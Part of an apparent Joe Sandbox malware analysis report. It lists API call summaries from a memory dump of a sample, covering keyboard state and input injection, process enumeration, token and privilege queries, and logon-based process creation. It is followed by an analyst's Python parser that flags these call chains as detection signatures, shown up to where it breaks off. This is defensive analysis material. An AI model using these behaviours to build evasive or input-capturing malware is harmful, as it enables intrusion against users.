                                               • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                              • String ID:
                                              • API String ID: 2652629310-0
                                              • Opcode ID: 7fb200aff6f33bd22fe68e15586b429b4880844ad3567749e9dd3e3db1e8e41c
                                              • Instruction ID: b1cee58c1fe44fdccd73f5c0109cc6b71ceb0bad1d95f48be6f5dbfb1b1cf3c4
                                              • Opcode Fuzzy Hash: 7fb200aff6f33bd22fe68e15586b429b4880844ad3567749e9dd3e3db1e8e41c
                                              • Instruction Fuzzy Hash: 4431AE72A0020AAFDF249F65DC45EAF7BA6EB42710B194268FC05E6150EB35CD54CBB0
                                              APIs
                                              • SendMessageW.USER32(?,00001024,00000000,?), ref: 00E05352
                                              • GetWindowLongW.USER32(?,000000F0), ref: 00E05375
                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00E05382
                                              • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00E053A8
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                               • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: LongWindow$InvalidateMessageRectSend
                                              • String ID:
                                              • API String ID: 3340791633-0
                                              • Opcode ID: 31edac691585cc1ee65f84ac612f07fed99316ad4c5aa1e28989161708a7675a
                                              • Instruction ID: 2857d02ed7418d70978a05e510de2e19db2837fbc5264b14f4d1ca60b1871a95
                                              • Opcode Fuzzy Hash: 31edac691585cc1ee65f84ac612f07fed99316ad4c5aa1e28989161708a7675a
                                              • Instruction Fuzzy Hash: E7310036A55A08EFEF309F14CC06BEA7765EB05394F586501FA00B62E4C7B9A9C0DF52
                                              APIs
                                              • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 00DDABF1
                                              • SetKeyboardState.USER32(00000080,?,00008000), ref: 00DDAC0D
                                              • PostMessageW.USER32(00000000,00000101,00000000), ref: 00DDAC74
                                              • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 00DDACC6
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                               • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: KeyboardState$InputMessagePostSend
                                              • String ID:
                                              • API String ID: 432972143-0
                                              • Opcode ID: a84248dc6e17335f16b4e0df5d77cd90ad309fdfeeb83b96ff3453934c1158a9
                                              • Instruction ID: 98f380a15be8d80cb1bb11538910456af382025aaa92b99223f4debc1aeb2c71
                                              • Opcode Fuzzy Hash: a84248dc6e17335f16b4e0df5d77cd90ad309fdfeeb83b96ff3453934c1158a9
                                              • Instruction Fuzzy Hash: 29310634A60618AFEF35CB6D8C047FA7BA5AB89330F18831BE485923D1C375C9858772
                                              APIs
                                              • ClientToScreen.USER32(?,?), ref: 00E0769A
                                              • GetWindowRect.USER32(?,?), ref: 00E07710
                                              • PtInRect.USER32(?,?,00E08B89), ref: 00E07720
                                              • MessageBeep.USER32(00000000), ref: 00E0778C
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Rect$BeepClientMessageScreenWindow
                                              • String ID:
                                              • API String ID: 1352109105-0
                                              • Opcode ID: 6be56e9544dc67055f06baa32c353a52d5972bc1b6ba4a06658cec4fcc66f693
                                              • Instruction ID: c82ef3c531f0d96d03755cc165ee62deb9432f2cd1ec520ce0564e6eab7d9832
                                              • Opcode Fuzzy Hash: 6be56e9544dc67055f06baa32c353a52d5972bc1b6ba4a06658cec4fcc66f693
                                              • Instruction Fuzzy Hash: 5A41BF38A05214DFCB01CF59C894EA977F0FB49345F1851AAE994AB2A0C331F9C6CF90
                                              APIs
                                              • GetForegroundWindow.USER32 ref: 00E016EB
                                                • Part of subcall function 00DD3A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00DD3A57
                                                • Part of subcall function 00DD3A3D: GetCurrentThreadId.KERNEL32 ref: 00DD3A5E
                                                • Part of subcall function 00DD3A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00DD25B3), ref: 00DD3A65
                                              • GetCaretPos.USER32(?), ref: 00E016FF
                                              • ClientToScreen.USER32(00000000,?), ref: 00E0174C
                                              • GetForegroundWindow.USER32 ref: 00E01752
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                              • String ID:
                                              • API String ID: 2759813231-0
                                              • Opcode ID: 8c3ddb2937ea18fa0a37defeadaf4e36bfe0d99f94ed56fe9877994013d12acf
                                              • Instruction ID: 5434a61025a2c9d93b2f60daf232cf3b02c906a72c6a0da0a754443e4da2d836
                                              • Opcode Fuzzy Hash: 8c3ddb2937ea18fa0a37defeadaf4e36bfe0d99f94ed56fe9877994013d12acf
                                              • Instruction Fuzzy Hash: 20313075D01149AFC704EFAAC881CAEBBF9EF89304B5480AAE415E7251E731DE45CBB1
                                              APIs
                                              • CreateToolhelp32Snapshot.KERNEL32 ref: 00DDD501
                                              • Process32FirstW.KERNEL32(00000000,?), ref: 00DDD50F
                                              • Process32NextW.KERNEL32(00000000,?), ref: 00DDD52F
                                              • CloseHandle.KERNEL32(00000000), ref: 00DDD5DC
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                              • String ID:
                                              • API String ID: 420147892-0
                                              • Opcode ID: 519f757fdf41b2da305ff99bf8d37a4ef6be782b3cd9e2d6e5cd6d2bf460acac
                                              • Instruction ID: 32cc3e0f03a19f802569ba3508772d7002dbf5dc8a35e69d85c0b473ba15200d
                                              • Opcode Fuzzy Hash: 519f757fdf41b2da305ff99bf8d37a4ef6be782b3cd9e2d6e5cd6d2bf460acac
                                              • Instruction Fuzzy Hash: 033190720082009FD701EF54D881AAFBBF8EF99354F14452DF585962A1EB719949CBB2
                                              APIs
                                              • GetFileAttributesW.KERNEL32(?,00E0CB68), ref: 00DDD2FB
                                              • GetLastError.KERNEL32 ref: 00DDD30A
                                              • CreateDirectoryW.KERNEL32(?,00000000), ref: 00DDD319
                                              • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00E0CB68), ref: 00DDD376
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: CreateDirectory$AttributesErrorFileLast
                                              • String ID:
                                              • API String ID: 2267087916-0
                                              • Opcode ID: 2c7e1978c3841f8c15b79c24be8cbd3cce2a9d8e36db89c1489f4746185a12c9
                                              • Instruction ID: 590bc500b01bd1a98900f1d251fd6cf52c35ef30af54fc43658b83da3c4c281d
                                              • Opcode Fuzzy Hash: 2c7e1978c3841f8c15b79c24be8cbd3cce2a9d8e36db89c1489f4746185a12c9
                                              • Instruction Fuzzy Hash: 4F216D705093019FCB10DF68C88186ABBE4EF56764F244A1EF499D73A1E731D94ACBA3
                                              APIs
                                                • Part of subcall function 00DD1014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00DD102A
                                                • Part of subcall function 00DD1014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00DD1036
                                                • Part of subcall function 00DD1014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00DD1045
                                                • Part of subcall function 00DD1014: RtlAllocateHeap.NTDLL(00000000,?,TokenIntegrityLevel), ref: 00DD104C
                                                • Part of subcall function 00DD1014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00DD1062
                                              • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00DD15BE
                                              • _memcmp.LIBVCRUNTIME ref: 00DD15E1
                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00DD1617
                                              • HeapFree.KERNEL32(00000000), ref: 00DD161E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Heap$InformationProcessToken$AllocateErrorFreeLastLookupPrivilegeValue_memcmp
                                              • String ID:
                                              • API String ID: 2182266621-0
                                              • Opcode ID: 4aea4ebbc8f2a1693e3e45e8c8a61b91a05a4d4b5ce88dfd28996b2f27666d47
                                              • Instruction ID: 0d5c9f02d1e9e61fa7dcc65813032d9e168df4f7b7c313b87bfc07fecc440812
                                              • Opcode Fuzzy Hash: 4aea4ebbc8f2a1693e3e45e8c8a61b91a05a4d4b5ce88dfd28996b2f27666d47
                                              • Instruction Fuzzy Hash: C8218975E00109FFDF00DFA4C949BEEB7B8EF44344F18455AE441AB241E735AA89CBA0
                                              APIs
                                              • GetWindowLongW.USER32(?,000000EC), ref: 00E0280A
                                              • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00E02824
                                              • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00E02832
                                              • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00E02840
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Window$Long$AttributesLayered
                                              • String ID:
                                              • API String ID: 2169480361-0
                                              • Opcode ID: 913a2d21001ec8b1501ef7e7176fcdeaf7239eb101ef8a316b65232192ce2403
                                              • Instruction ID: 9e32a209dec17ea97ca8e515523cc9ba5d54c402ed122dc355a72fb8799d70b7
                                              • Opcode Fuzzy Hash: 913a2d21001ec8b1501ef7e7176fcdeaf7239eb101ef8a316b65232192ce2403
                                              • Instruction Fuzzy Hash: CC21B235604111AFD7149B24CC48FAA77A5EF45328F24825DF5169B6D2CB71EC82C7A0
                                              APIs
                                                • Part of subcall function 00DD8D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,00DD790A,?,000000FF,?,00DD8754,00000000,?,0000001C,?,?), ref: 00DD8D8C
                                                • Part of subcall function 00DD8D7D: lstrcpyW.KERNEL32(00000000,?,?,00DD790A,?,000000FF,?,00DD8754,00000000,?,0000001C,?,?,00000000), ref: 00DD8DB2
                                                • Part of subcall function 00DD8D7D: lstrcmpiW.KERNEL32(00000000,?,00DD790A,?,000000FF,?,00DD8754,00000000,?,0000001C,?,?), ref: 00DD8DE3
                                              • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00DD8754,00000000,?,0000001C,?,?,00000000), ref: 00DD7923
                                              • lstrcpyW.KERNEL32(00000000,?,?,00DD8754,00000000,?,0000001C,?,?,00000000), ref: 00DD7949
                                              • lstrcmpiW.KERNEL32(00000002,cdecl,?,00DD8754,00000000,?,0000001C,?,?,00000000), ref: 00DD7984
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: lstrcmpilstrcpylstrlen
                                              • String ID: cdecl
                                              • API String ID: 4031866154-3896280584
                                              • Opcode ID: 81d07ef5ef553b38fa658e1318076786641e0bafdafbe6fb25f87996a520b1ef
                                              • Instruction ID: 498b6f1bd637ff7030ed1b81e004e7ab6759bba3110f8aa7ea8a8c912b89baae
                                              • Opcode Fuzzy Hash: 81d07ef5ef553b38fa658e1318076786641e0bafdafbe6fb25f87996a520b1ef
                                              • Instruction Fuzzy Hash: 6911AF3A200202AFCB25AF35D855D7A77A9FF85350B50406BF946C73A4EB329851DBB1
                                              APIs
                                              • GetWindowLongW.USER32(?,000000F0), ref: 00E07D0B
                                              • SetWindowLongW.USER32(00000000,000000F0,?), ref: 00E07D2A
                                              • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00E07D42
                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00DEB7AD,00000000), ref: 00E07D6B
                                                • Part of subcall function 00D89BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00D89BB2
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Window$Long
                                              • String ID:
                                              • API String ID: 847901565-0
                                              • Opcode ID: d4f9e71ee74e4cb392420f707a726c915a56751e75338a7c835a035f45141016
                                              • Instruction ID: f8430d5eb6d33d6a9a721755ba1f189ceb72c80c63cd2c5a350ebb4ac3df7b56
                                              • Opcode Fuzzy Hash: d4f9e71ee74e4cb392420f707a726c915a56751e75338a7c835a035f45141016
                                              • Instruction Fuzzy Hash: 23110F31A04614AFCB108F29CC04AA63BA4EF86364B205324F979E72F0E731E9D1CB50
                                              APIs
                                              • SendMessageW.USER32(?,00001060,?,00000004), ref: 00E056BB
                                              • _wcslen.LIBCMT ref: 00E056CD
                                              • _wcslen.LIBCMT ref: 00E056D8
                                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 00E05816
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: MessageSend_wcslen
                                              • String ID:
                                              • API String ID: 455545452-0
                                              • Opcode ID: 055ad85a9485d290a5951a3dce3c958bf3e8ad9eaa640325b6eef163426b00b5
                                              • Instruction ID: 1ec368aeee353fcf52ac71aa23b70d57d443f8df30362a4f501fcdd96b454c0b
                                              • Opcode Fuzzy Hash: 055ad85a9485d290a5951a3dce3c958bf3e8ad9eaa640325b6eef163426b00b5
                                              • Instruction Fuzzy Hash: 1911A276600608A6DF209B61DC85AFF77ACEF11764B50512AF916B60C1EB7089C5CF60
                                              APIs
                                              • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00DD14FF
                                              • OpenProcessToken.ADVAPI32(00000000), ref: 00DD1506
                                              • CloseHandle.KERNEL32(00000004), ref: 00DD1520
                                              • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00DD154F
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Process$CloseCreateCurrentHandleLogonOpenTokenWith
                                              • String ID:
                                              • API String ID: 2621361867-0
                                              • Opcode ID: 2ec65083cb95891f1e5aa5bd7dfc43f9b327c7dc7e495014d0fad7e0fcb67d0e
                                              • Instruction ID: 77cdec8754e1505c76aab9ef628399d85c5af8fd139368aa2ca22d8c953d40f4
                                              • Opcode Fuzzy Hash: 2ec65083cb95891f1e5aa5bd7dfc43f9b327c7dc7e495014d0fad7e0fcb67d0e
                                              • Instruction Fuzzy Hash: 3E114A7650020ABFDB118FA4ED49BDE7BA9EF48704F188115FA05A21A0C376CE64DB60
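The API blocks in this section are raw per-function summaries. What a triage analyst usually wants from them is the call chain of each block, normalised so that Process32FirstW and Process32First compare equal, plus a flag when a chain matches a behaviour worth a second look: the CreateToolhelp32Snapshot / Process32FirstW / Process32NextW walk (the pattern behind the report's sandbox-detection signature), the AttachThreadInput subcall under GetForegroundWindow / GetCaretPos, the GetTokenInformation(TokenIntegrityLevel) / LookupPrivilegeValueW query, and OpenProcessToken followed by CreateProcessWithLogonW. The Python below is an added example of such a parser; it is not Joe Sandbox code and nothing from the sample. Its input is constructed by copying four of the blocks above verbatim, and the chain signatures and their labels are my own assumptions about what merits flagging, not the sandbox's rules.

```python
"""Parse Joe Sandbox 'APIs' call listings and flag known API chains.
Added analyst helper, not Joe Sandbox code: SAMPLE is copied from this report's
listings; SIGNATURES are my own chains to surface, not the sandbox's rules."""
import re
from collections import namedtuple

# One bullet line, optionally prefixed 'Part of subcall function <addr>:'; the
# argument list may be absent ('• CreateToolhelp32Snapshot.KERNEL32 ref: 00DDD501').
CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<mod>\w+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$")

# Chains matched as an in-order subsequence of a block's calls (my assumption).
SIGNATURES = {
    "Toolhelp32 process walk (analysis-tool / sandbox checks)":
        ["CreateToolhelp32Snapshot", "Process32First", "Process32Next"],
    "attach to foreground window's input thread (caret / keyboard state)":
        ["GetWindowThreadProcessId", "GetCurrentThreadId", "AttachThreadInput"],
    "token integrity level + privilege LUID lookup":
        ["GetTokenInformation", "LookupPrivilegeValue"],
    "process creation under alternate credentials":
        ["OpenProcessToken", "CreateProcessWithLogon"],
}

# ref = call-site address in the dump; subcall_of = callee address when the line
# is listed as 'Part of subcall function', else None.
ApiCall = namedtuple("ApiCall", "api module args ref subcall_of")


def split_args(text):
    """Split on top-level commas only, so '00000003(TokenIntegrityLevel)' stays whole."""
    out, cur, depth = [], "", 0
    for ch in text or "":
        depth += (ch == "(") - (ch == ")")
        if ch == "," and depth == 0:
            out, cur = out + [cur], ""
        else:
            cur += ch
    return out + [cur] if cur else out


def normalize(api):
    """Fold ANSI/Unicode suffixes: Process32FirstW -> Process32First, lstrcmpiW -> lstrcmpi."""
    return re.sub(r"(?<=[a-z0-9])[AW]$", "", api)


def parse_report(text):
    """One list of ApiCall per 'APIs' block; any other header line ends the block."""
    records, current = [], None
    for line in text.splitlines():
        stripped = line.strip()
        if stripped == "APIs":
            current = []
            records.append(current)
        elif current is not None:
            m = CALL_RE.match(line)
            if m:
                current.append(ApiCall(m["api"], m["mod"], split_args(m["args"]), m["ref"], m["sub"]))
            elif stripped and not stripped.startswith("•"):
                current = None  # 'Memory Dump Source', 'Strings', ...
    return [r for r in records if r]


def match_signatures(record):
    names = [normalize(c.api) for c in record]

    def follows(chain):  # subsequence test: each element must occur after the previous match
        it = iter(names)
        return all(any(n == h for h in it) for n in chain)
    return [label for label, chain in SIGNATURES.items() if follows(chain)]


def analyze(text):
    """Per block: first own call site, APIs in order, symbolised args, matched chains."""
    out = []
    for record in parse_report(text):
        own = [c for c in record if c.subcall_of is None] or record
        symbols = [(c.api, m.group(1)) for c in record for a in c.args
                   if (m := re.fullmatch(r"[0-9A-F]+\((\w+)\)", a))]
        out.append({"first_ref": own[0].ref, "apis": [c.api for c in record],
                    "symbols": symbols, "matches": match_signatures(record)})
    return out


# Constructed input: four APIs blocks copied from this report (bullets as on the page).
SAMPLE = """\
APIs
• CreateToolhelp32Snapshot.KERNEL32 ref: 00DDD501
• Process32FirstW.KERNEL32(00000000,?), ref: 00DDD50F
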